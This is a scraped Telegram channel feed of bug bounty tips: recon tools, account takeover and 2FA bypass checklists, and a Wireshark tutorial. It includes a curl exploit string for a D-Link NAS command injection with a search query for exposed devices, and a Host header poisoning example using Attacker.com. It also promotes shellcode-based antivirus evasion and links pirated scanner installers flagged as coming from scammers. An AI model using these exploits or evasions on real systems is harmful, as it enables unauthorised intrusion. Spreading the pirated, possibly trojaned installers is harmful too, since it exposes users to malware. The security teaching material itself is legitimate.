bugbounty_tech | Unsorted

Telegram-канал bugbounty_tech - Bug bounty Tips

2246

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Subscribe to a channel

Bug bounty Tips

🔖afrog🐸 - A Security Tool for Bug Bounty, Pentest and Red Teaming.

afrog is a high-performance vulnerability scanner that is fast and stable. It supports user-defined PoC and comes with several built-in types, such as CVE, CNVD, default passwords, information disclosure, fingerprint identification, unauthorized access, arbitrary file reading, and command execution. With afrog, network security professionals can quickly validate and remediate vulnerabilities, which helps to enhance their security defense capabilities.


Installation
go install -v github.com/zan8in/afrog/v3/cmd/afrog@latest


📱Github: 🔗Link

Читать полностью…

Bug bounty Tips

☄️𝗔𝗰𝗰𝗼𝘂𝗻𝘁 𝗧𝗮𝗸𝗲𝗼𝘃𝗲𝗿 𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆 𝗧𝗶𝗽𝘀 𝗳𝗼𝗿 𝗡𝗲𝘄 𝗕𝘂𝗴 𝗛𝘂𝗻𝘁𝗲𝗿𝘀☄️

⚠️Simplified Tips for Account Takeover (ATO)

1. Pre-Account Takeover
- How to Hunt:
- Register an email without verifying it.
- Register again using a different method (e.g., 'sign up with Google') with the same email.
- Check if the application links both accounts.
- Try logging in to see if you can access information from the other account.

2. Account Takeover due to Improper Rate Limiting
- How to Hunt:
- Capture the login request.
- Use tools like Burp Suite's Intruder to brute-force the login.
- Analyze the response and length to detect anomalies.

3. Account Takeover by Utilizing Sensitive Data Exposure
- How to Hunt:
- Pay attention to the request and response parts of the application.
- Look for exposed sensitive data like OTPs, hashes, or passwords.

4. Login Vulnerabilities
- Check for:
- Brute-force vulnerabilities.
- OAuth misconfigurations.
- OTP brute-forcing.
- JWT misconfigurations.
- SQL injection to bypass authentication.
- Proper validation of OTP or tokens.

5. Password Reset Vulnerabilities
- Check for:
- Brute-force vulnerabilities in password reset OTPs.
- Predictable tokens.
- JWT misconfigurations.
- IDOR vulnerabilities.
- Host header injection.
- Leaked tokens or OTPs in HTTP responses.
- Proper validation of OTP or tokens.
- HTTP parameter pollution (HPP).

6. XSS to Account Takeover
- How to Hunt:
- Try to exfiltrate cookies or auth tokens.
- Craft XSS payloads to change user email or password.

7. CSRF to Account Takeover
- Check for:
- Vulnerabilities in email update endpoints.
- Vulnerabilities in password change endpoints.

8. IDOR to Account Takeover
- Check for:

- Vulnerabilities in email update endpoints.
- Vulnerabilities in password change endpoints.
- Vulnerabilities in password reset endpoints.

9. Account Takeover by Response & Status Code Manipulation- How to Hunt:
- Look for vulnerabilities where manipulating response or status codes can lead to account takeover.

10. Account Takeover by Exploiting Weak Cryptography- Check for:
- Weak cryptographic implementations in password reset processes.

11. Password or Email Change Function- How to Hunt:
- If you see email parameters in password change requests, try changing your email to the victim's email.

12. Sign-Up Function- How to Hunt:
- Try signing up with the target email directly. - Use third-party sign-ups with phone numbers, then link the victim's email to your account.

13. Rest Token
- How to Hunt: - Try using your REST token with the target account.
- Brute 13. Rest Token- How to Hunt:
- Try using your REST token with the target account. - Brute force the REST token if it is numeric.
- Try to figure out how the tokens are generated. For example, check if they are generated based on timestamp, user ID, or email.

14. Host Header Injection- How to Hunt:
- Intercept the REST account request. - Change the Host header value from the target site to your own domain (e.g., `POST /PassRest HTTP/1.1 Host: Attacker.com`).

15. CORS Misconfiguration to Account Takeover
- How to Hunt: - Check if the application has CORS misconfigurations.
- If so, you might be able to steal sensitive information from the user to take over their account or make them change authentication information. - Refer to [CORS Bypass](https://book.hacktricks.xyz/pentesting-web/cors-bypass) for more details.

16. Account Takeover via Leaked Session Cookie
- How to Hunt: - Look for vulnerabilities where session cookies are leaked.
- Refer to [HackerOne Report 745324](https://hackerone.com/reports/745324) for more details.

17. HTTP Request Smuggling to ATO- How to Hunt:
- Look for HTTP request smuggling vulnerabilities.
- Refer to [HackerOne Reports 737140 and 740037](https://hackerone.com/reports/737140) and [HackerOne Report 740037](https://hackerone.com/reports/740037) for more details.

Читать полностью…

Bug bounty Tips

🔷 Learn about Wireshark Network Analysis Tool on Kali Linux⬜️

---

introduction

Welcome😴 Today, we will learn about one of the most powerful network analysis tools in the Linux world: Wireshark . If you want to monitor and analyze traffic on your network, and understand different protocols, Wireshark is the perfect tool for you!

---

What is Wireshark?🤔

Wireshark is an open source network protocol analyzer that allows you to capture and examine data traffic in real time or from saved files. With Wireshark, you can:

- Monitor network traffic
in detail.🌐
- Analyze protocols and understand how they work.🔍
- Troubleshoot and fix network issues.📎
- Learn more about computer networks and different protocols.📚

---

How to Install Wireshark on Kali Linux⚙️

On Kali Linux, Wireshark is usually installed by default. But if it is not installed, you can easily install it:

sudo apt update
sudo apt install wireshark


During installation, you may be asked whether you want to allow non-root users to capture packages. If you want to, choose Yes .


---

How to use Wireshark🔖

After installation, you can launch Wireshark through the main menu or by typing the following command in the terminal:

wireshark


An interactive graphical interface will appear.

---

Start capturing packets🗣️

1. Select a network interface : When you open Wireshark, a list of available network interfaces will appear. Select the interface you want to monitor (such as eth0 or wlan0 ). 🖧

2. Start Capture: Double-click the interface or press the Start button to start capturing packets.😀

3. View Packets : Packets will start appearing in the list instantly, with details such as time, source, destination, protocol, and information.

---

Packet analysis🔍

- Packet Filtering : You can use the filter bar to select only the protocols or addresses you want to display. For example:
http to display only HTTP packets.
- ip.addr == 192.168.1.1 to display packets related to a specific IP address.

- Inspect the packet : Click on any packet to view its details at the bottom, where you can explore the protocol headers and information sent.

---

Save and load files 💾

- Save capture : You can save the current session for later review by:
- Go to File > Save As and specify a file name and location.

- Upload a file : If you have a saved package file, you can open it by:
- Go to File > Open and select the file.

---

Advanced uses⭐️

TCP flow monitoring

- Reassemble Conversations : You can reassemble an entire TCP conversation by:
- Right click on a package.
- Select Follow > TCP Stream .
- A window will appear containing the data exchanged between the two parties.

Analysis of different protocols

- DNS, HTTP, FTP, etc .: You can analyze how these protocols work and see the data sent and received.

---

Important tips⚠️

- Privacy and Security : Make sure you have permission to monitor the network, as capturing packets may be illegal if done without consent.

- Run as administrator : To capture packets, you may need to run Wireshark with root privileges or add the user to the wireshark group.

---

conclusion

Wireshark is a powerful tool that helps you better understand your network and solve problems effectively. Whether you are a network administrator, developer, or student, Wireshark will provide you with a deep insight into the world of networking. Try it now and enjoy learning more!🏠

Posted by @BugSpy don't share without credit.
Make me admin in your channel to get more followers !! And awesome content for free🦋

Читать полностью…

Bug bounty Tips

Acunetix v24.9.241015145 - 17 Oct 2024

Windows: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v24.9.241015145-Windows-Pwn3rzs-CyberArsenal.rar

Linux: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v24.9.241015145-Linux-Pwn3rzs-CyberArsenal.7z

Password: Pwn3rzs

⚠️ Installers come from the known scammer channel, so remember to pay attention and use a safe environment!!!! ⚠️

Changelog:

Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v24-9-2-16-october-2024/

Читать полностью…

Bug bounty Tips

https://x.com/Cipher0ps_tech/status/1856219986382991786?t=mQzUz_vib-Wg2EbEBym8gw&s=35

Читать полностью…

Bug bounty Tips

1 .Premium Courses for free
2. 22 TB BIG COLLECTION PREMIUM COURSE 🎭 mega link
3.22 TB BIG COLLECTION PREMIUM COURSE 🎭 drive link
All gfg courses
4.gfg Striver live classes DSA problem solving
5.gfg Placement 100 interview preparation
6.gfg Data structures with python
7.gfg Os DBMS cn for sde interview
8.gfg Self placed dsa
9.gfg Java foundation
10.gfg Fundamentals of java
11.gfg Python foundation
12.gfg Java app development -winter training
13. Gfg C programming
14. Gfg Amazon sde test series
15 . Gfg Java backend
16. Gfg Java lectures
Gfg completed all courses
17.All courses by Angela yu course
18. iNeuron - Full Stack Web Development with Python in Hindi
19. Full stack block chain development
20. Full stack data development
21. Full stack javascript developer
22. Job ready big data bootcamp
23. Mastering data science
24. Full stack web development 2.0
25. Five thousands+ cheat notes
26.Java DSA by hitesh chaudary
27.Scaler java
28. Placement materials 1tb drive link
29. Farz - Data Structures & Algorithms Fellowship
30. All 𝗣𝗬𝗧𝗛𝗢𝗡 𝗠𝗘𝗚𝗔 𝗖𝗢𝗨𝗥𝗦𝗘
31. Huge Road Maps Collections for Developers
32. [AppliedAI] Machine Learning Online Course
33. Full stack web development english
34. 100+ Paid Courses Drive Link
35. Made easy gate mega link
35 . unacademy, gateacademy
36. Ace gate
37.GATEFLIX [CSE]
38.extra high quality education 100 gb Drive link
39. Namaste node js
40. Gate ESE Course Download mega link
41. devops complete course
42.Mera placement hoga course
mega link

43. *📚 All Type of Campus Placement Material 📚*
44.Programming and Data Structures - Subbarao Lingamgunta - GATE 2024 Mega link
45.GAME DEVELOPMENT COURSE
LEARN HOW TO MAKE GAMES IN UNITY! ✅
Mega link

46. Master the Coding Interview_ Data Structures
47.[CodingBlocks] Android App Development Master Course
48.Coding Blocks Web Development with Python-Django
49.Coding Blocks - Master Interview Questions for FAANG & Product Companies
50.[Coding Blocks] Data Structures in Real Life Projects
51. Data Science Master Course code blocks
52. CodeEater - Blockchain Easy Download
53. Leet code courses
54. Machine learning 🫥🫥
55. Coding ninjas full stack web development
56. Coding blocks - Competitive programming
57.[Coding Ninjas] Advanced Front-End Web Development with React
58.PrepBytes courses
59. 100 Days of Code The Complete Python Pro Bootcamp
60. [Coding Ninjas] Java Foundation with Data Structures & Algorithms [English & Hindi]
61. [CodingNinjas] Python Foundation with Data Structures & Algorithms
62. Complete delta course
Apna college Part 1

Apna college Part 2

63.📚 Complete Front end resources
64.React native courses
65.*🔰 22 UDEMY LATEST COURSES 🔰*
66.Code With Mosh Course 170gb course
67.COMPLETE ANDROID DEVELOPER COURSE BUILD IN 14 APPS
68.US wale - kohort
69.*🔰 100GB+ OF EDITING PACK/PRESET PACK | READY TO USE 🔰*
70.GATE - CSE ❤️
71.Spring boot Microservies 24-25 Setup course
72.Ashok it Gen Ai Latest 2024-25
73.HiteshChoudharyWebDev
Complete web development

PREPINSTA courses
74. PREPINSTA - ROYAL PASS
75 . C CPP courses - PREPINSTA
76.DSA - PREPINSTA
77. PREPINSTA - TCS NQT Course 2023
78.PREPINSTA - ELITMUS COURSE
79.PREPINSTA - Wipro NLTH
80.Dsa gfg c/c++
81. Apna college c++
82.Sigma batch apna college:
83.Delta batch Apna college
84. complete-machine-learning-nlp-bootcamp-mlops
85. Data Structures and Algorithms with JAVA
86. Love Babbar Oops unacademy
87.🔰 PyTorch for Deep Learning Bootcamp
88.Abdul Bari sir java programming
89.[IIBM institute] ai and machine learning
90.ALL CODING BLOCKS COURSES IN ONE LINK
**How to open this link**
**Secure telegram channel**
**WhatsApp channel**
**Second telegram channel **
**@all_courses_for_fre**

Читать полностью…

Bug bounty Tips

OSCP Cheat Sheet.pdf

Читать полностью…

Bug bounty Tips

before 2FA.

30. Improper Access Control to Backup Codes
- If there are CORS misconfigurations or XSS vulnerabilities, backup codes can be stolen and used to bypass 2FA if the username and password are known.

31. Information Disclosure
- If confidential information, like the phone number, appears on the 2FA page that wasn't known previously, it's an information disclosure vulnerability.

32. Bypass 2FA with null or 000000
- Sometimes, 2FA can be bypassed by using null or 000000 as the code.

33. Previously Created Sessions Continue Being Valid After MFA Activation
- Access the same account on two devices. Enable 2FA on one device. If the session on the other device is still active, it's an issue.

34. Enable 2FA Without Verifying the Email
- Check if you can add 2FA to your account without verifying your email.

35. Password Not Checked When Disabling 2FA
- Try to disable 2FA without checking the password. If it succeeds, it’s a vulnerability.

36. “email” MFA Mode Allows Bypassing MFA From Victim’s Device When Device Trust Is Not Expired
- Use tools like Burp Suite to intercept requests. Modify the fields to bypass 2FA using the "email" mode.

Читать полностью…

Bug bounty Tips

Bypassing Two-Factor Authentication (2FA)

1. Flawed Two-Factor Verification Logic
- Attackers can log in with their own credentials but change the
account cookie to any arbitrary username when submitting the verification code.

2. Clickjacking on 2FA Disable Feature
- Try to iframe the page where 2FA can be disabled. If successful, use social engineering to trick the victim.

3. Response Manipulation
- Check the 2FA request response. If it shows "Success":false, change it to "Success":true to bypass 2FA.

Читать полностью…

Bug bounty Tips

☄️Bug Bounty Tip: Finding Confidential Documents Fast☄️

1.Use Katana to scan for document URLs:

katana -u subdomainsList -em pdf,docx | tee endpointsPDF_DOC

2. Filter for potentially unredacted files:
grep -i 'redacted.*\.pdf$' endpointsPDF_DOC | sed -E 's/[-_]?redacted//gi' | sort -u | httpx -mc 200 -sc


This script finds document URLs with "redacted" in the name, strips it out, and checks if the unredacted version is accessible.

Admins often leave these unredacted files online by mistake, making them a high-medium (P3) severity finding for bug bounty programs.

Читать полностью…

Bug bounty Tips

CVE-2024-10914 (CVSS 9.2): Command Injection Flaw Threatens 61,000+ D-Link NAS Devices

The vulnerability is localized to the account_mgr.cgi script, particularly in the handling of the cgi_user_add command. The name parameter in this script does not adequately sanitize input, allowing for command execution.

Exploit:

curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"


Affected Devices:
DNS-320 – Version 1.00
DNS-320LW – Version 1.01.0914.2012
DNS-325 – Versions 1.01 and 1.02
DNS-340L – Version 1.08


Search query:
FOFA: app="D_Link-DNS-ShareCenter"

Читать полностью…

Bug bounty Tips

𝗔𝗽𝗽𝗹𝘆𝗶𝗻𝗴 𝗟𝗟𝗠'𝘀 & 𝗚𝗲𝗻 𝗔𝗜 𝘁𝗼 𝗖𝘆𝗯𝗲𝗿𝘀𝗲𝗰𝘂𝗿𝗶𝘁𝘆 🍁

List of resources for everything you need to know about how to build and apply LLMs even if you don't have a background in data science, software engineering, machine learning, AI, but want to join the GenAI wave

Link 🔗:-
https://start.me/p/9oJvxx/applying-llms-genai-to-cyber-security

Читать полностью…

Bug bounty Tips

Check for Subdomain Takeover Vulnerabilities

This enumerates subdomains and checks if they resolve. Subdomains that return NXDOMAIN may be vulnerable to takeover if they point to external services.

subfinder -d target.com -silent | while read sub; do host $sub; done | grep "NXDOMAIN"


Replace nasa.gov with your target.

Читать полностью…

Bug bounty Tips

Learn javascript that helps you to read js files, Most important thing to do.
I Found a medium article on it that explain everything, MUST READ.

Part 1: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-1-dd08ed34b5a8

Part 2: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-2-f82164917e7

Part 3: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-3-3b987f24ab27

Читать полностью…

Bug bounty Tips

https://github.com/ferreiraklet/jeeves

Time Based Blind Injection Scanner

Читать полностью…

Bug bounty Tips

18. Bypassing Digits Origin Validation Which Leads to Account Takeover- How to Hunt:
- Look for vulnerabilities where digits origin validation can be bypassed. - Refer to [HackerOne Report 129873](https://hackerone.com/reports/129873) for more details.

19. Top ATO Reports in HackerOne
- How to Hunt: - Review top account takeover reports in HackerOne.
- Refer to [TOP ACCOUNT TAKEOVER](https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPACCOUNTTAKEOVER.md) for more details.

Читать полностью…

Bug bounty Tips

TCM Security All Courses Working Links

TCM - Practical API Hacking
Download link
https://mega.nz/file/hbsiGBgB#ga6xtaKR34RVD9AkplbT3TFS-4w_qPuz1u-PO08Bp68


TCM Security Beginners Guide to IOT and Hardware Hacking
https://mega.nz/file/XdpgqZbK#FJYd5jYGlv9IEAj7 in group


Mobile App pentesting TCM course
https://mega.nz/folder/g2g0nKRT#2XcoogAEmY-0I2_e6H-EbA


TCM pratical website penetration testing course
https://mega.nz/file/aB4FwYbC#mhbmg5paSYnQzeKfSIu5sjkiItRFFMhJS61inuYiXzA


TCM - Academy Live Workshops 2024
https://mega.nz/file/FHFU3CjI#RE42dC0Xv9prS4vQQMA2L9B-VQX3cD-gwc_ZPTLNgms


TCM - Linux Privilege Escalation for Beginners2024
☠Download link
https://mega.nz/file/tXNTALAJ#sHd67ibXDCNctt_5ElBMUfe79AYt7VQEEIibzOuj2UY

TCM - Windows Privilege Escalation for Beginners2024
Download Link:
https://mega.nz/file/NKMkDL4C#YCOFniKH2zZYfRbZx6DiCEZgQ8z_OtOfa12omh1vzrs

*📚 TCM Security C# 101 For Hackers Course Aug 2024 📚
> Download link:
https://mega.nz/folder/add3iSCC#fGd_clQxU8lMZZZ-pFBScw

TCM Security Practical Malware Analysis
https://mega.nz/folder/zrQHlKyS#ZUPIYssfkZaXj578WIUtWQ

TCM Security Practical Phishing Assessment
https://mega.nz/folder/frgnVY5A#A02_HFg-SKzn21jpG3l-Lg

TCM Security Python 101 For Hackers
https://mega.nz/folder/HjgQXJJJ#ok--ait7yppytYJol7jrxQ

📚 TCM Security Rust 101 For Hackers Course Aug 2024 📚
> Download link:
https://mega.nz/folder/LAlixBpD#xtR9LM5sfbU4qRCjEBfDOg

📚 TCM Security SOC 101 25 hours full course Aug 2024 📚
> Download link:
https://mega.nz/folder/fB0jVLwR#Lz3Db9D3yWB-juaRvuhfRw

TCM Security - Open-Source Intelligence (OSINT) Fundamentals
https://teraboxapp.com/s/1BDXVPWJkWjexCdy2oNh3FA

If you like this post, help us improving this channel

/channel/boost/bugbounty_tech

Читать полностью…

Bug bounty Tips

How to Use IPv4 to Bypass Any Signature-Based Antivirus Detection🔯

In this video you will learn technique for bypassing signature based antivirus detection by converting shellcode into IPv4 addresses. see exactly how this bypass method works

Posted by @BugSpy don't share without credit.
Make me admin in your channel to get more followers !! And awesome content for free🦋

Читать полностью…

Bug bounty Tips

Hack the Cybersecurity Interview - A complete interview preparation guide for jumpstarting your cybersecurity career by Ken Underhill, Christophe Foulon and Tia Hopkins (2022)

Читать полностью…

Bug bounty Tips

💙Cybersecurity Guide💙

Cybersecurity involves strategies and technologies designed to protect devices, networks, and data from unauthorized access or attacks.
 
Key Concepts

🚫Confidentiality
Ensuring that information is not accessed by unauthorized individuals.

♥️Integrity
Maintaining the accuracy and reliability of data by preventing modifications.


🕊Availability
Ensuring that information and resources are accessible to authorized users when needed.

🚨Common Threats
Phishing Attacks & Spammming
Malicious Websites/Site Spoofing
Password Cracking
Man-in-the-Middle Attacks (MITM)
Ransomware & Malwares 
Insider Threats
Unpatched Softwares

 
⭐️Fundamental Securities
Firewalls
Antivirus Softwares
Encryption Softwares
Access Controls#cidint
 
❤️Intermediate Concepts
Network Security
Application Security
Incident Response
Security Policies
 
🦇Advanced Cybersecurity Topics
Threat Intelligence
Penetration Testing
Security Information and Event Management
Zero Trust Architecture


Credit:-@MajorKali

Читать полностью…

Bug bounty Tips

■■■□□ CSRF + POST Body Param Reflection = POST-Based XSS.

https://blog.bhuwanbhetwal.com.np/csrf-post-body-param-reflection-post-based-xss-a-brainfuck

Читать полностью…

Bug bounty Tips

oscp+ ad methodology

Читать полностью…

Bug bounty Tips

4. Status Code Manipulation
- If the response status code is 4XX, change it to 200 OK to bypass 2FA.

5. 2FA Code Reusability
- Request a 2FA code and use it. Then try reusing it or requesting multiple codes to check if previously requested codes expire.

6. CSRF on 2FA Disable Feature
- Request a 2FA code and use it. Then try reusing it or requesting multiple codes to check if previously requested codes expire.

7. Backup Code Abuse
- Use techniques like response/status code manipulation, brute-force, etc., to bypass backup codes and disable/reset 2FA.

8. Enabling 2FA Doesn't Expire Previous Session
- Log in to the application in two different browsers. Enable 2FA in one session. Use the other session to check if it’s still active, which could be an issue.

9. 2FA Refer Check Bypass
- Directly navigate to the page after 2FA or any authenticated page. If it doesn't work, change the refer header to the 2FA page URL.

10. 2FA Code Leakage in Response
- Capture the request when 2FA code is triggered. Check the response to see if the 2FA code is leaked.

11. JS File Analysis
- Analyze all JS files referred in the response when triggering the 2FA code request to see if any contain information to bypass 2FA.

12. Lack of Brute-Force Protection
- Request 2FA codes repeatedly. If there’s no rate limit, it’s a rate limit issue. Try brute-forcing the 2FA code.

13. Password Reset/Email Change - 2FA Disable
- Change the victim's email or password. 2FA might be disabled, depending on the organization's policy.

14. Missing 2FA Code Integrity Validation
- Use a valid 2FA code from your account in the victim's 2FA request to see if it bypasses 2FA protection.

15. Direct Request
- Directly navigate to the page after 2FA or any authenticated page. Change the refer header as if you came from the 2FA page.

16. Reusing Token
- Try reusing a previously used token inside the account to authenticate.

17. Sharing Unused Tokens
- Check if you can get a token from your account and use it to bypass 2FA in a different account.

18. Leaked Token
- Check if a token is leaked in the response from the web application.

19. Session Permission
- Use the same session to start the flow using your account and the victim's account. Complete 2FA with your account but try accessing the next step with the victim's account.

20. Password Reset Function
- Check if the password reset function logs the user in after completion. Try reusing the link to reset the password multiple times.

21. Lack of Rate Limit
- Check if there’s a limit on the number of codes you can try. Brute force if there’s no limit.

22. Flow Rate Limit but No Rate Limit
- If there’s a flow rate limit but no rate limit, you can brute force the code with enough time.

23. Re-send Code and Reset the Limit
- If24. Infinite OTP Regeneration
- If you can generate a new OTP infinitely and the OTP is simple enough (e.g., 4 numbers), you can try the same 4 or 5 tokens every time and generate OTPs until it matches.

24. Guessable Cookie
- If the "remember me" functionality uses a guessable code in a new cookie, try to guess it.

25. Guessable Cookie
- If the "remember me" functionality uses a guessable code in a new cookie, try to guess it.

26. IP Address
- If the "remember me" functionality is attached to your IP address, you can try to figure out the IP address of the victim and impersonate it using the X-Forwarded-For header.

27. Subdomains
- Check for "testing" subdomains with login functionality. They might not support 2FA or might have vulnerable versions of it.

28. APIs
- Look for APIs located under a
/v*/ directory. Older API endpoints might be vulnerable to 2FA bypass.

29. Previous Sessions
- When 2FA is enabled, previous sessions should be ended. If not, an attacker could hijack an active session

Читать полностью…

Bug bounty Tips

⚠️ S3 Bucket Recon ⚠️

Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png

Читать полностью…

Bug bounty Tips

[ Passive Recon: Subdomains]

Key points of the report:
💬 What is DNS
💬 Difference between DNS and Vhost
💬 Working with passive DNS
💬 Popular dictionaries for searching
💬 Search utilities

Читать полностью…

Bug bounty Tips

Bug Bounty tips
IDOR via Reset password link
1- Ask for reset password
2- Click on the link and add new pass
3- Intercept the request with burpsuite
4- Found email parameter
5- Replace my email to the victim email
6- Found that the password of the victim is changed.

Читать полностью…

Bug bounty Tips

Breaking Down Multipart Parsers: File upload validation bypass

https://blog.sicuranext.com/breaking-down-multipart-parsers-validation-bypass/

Читать полностью…

Bug bounty Tips

Dorks and JS Files by zseano
https://www.youtube.com/watch?v=0jM8dDVifaI

Читать полностью…

Bug bounty Tips

Reduce Noise in Burp Suite with This Simple Trick! 🔥

💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:


.*\.google\.com

.*\.gstatic\.com

.*\.googleapis\.com

.*\.pki\.goog

.*\.mozilla\..*

If you have any other filters to do share, drop it on comments!

Читать полностью…

Bug bounty Tips

🕷Robofinder

I've developed a Python script that allows you to search for and retrieve historical robots.txt files for any given website using Archive.org. This tool is particularly useful for security researchers and web archivists to discover previously accessible paths or directories that were once listed in a site's robots.txt.

1. Clone the repository and install the required dependencies:
git clone https://github.com/Spix0r/robofinder.git
cd robofinder
pip install -r requirements.txt

2. Run the program by providing a URL with the -u flag:
python3 robofinder.py -u https://example.com

👀 Discover additional commands and options on GitHub page (don’t forget to give it a star ⭐️)👇

📱Github: 🔗Link

#CyberSecurity #bugbountyTools #bugbounty #Recon #reconnaissance #infosec #Archive #bugbountytips
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 /channel/bugbounty_tech
🔸🔸🔸🔸🔸🔸🔸🔸

Читать полностью…
Subscribe to a channel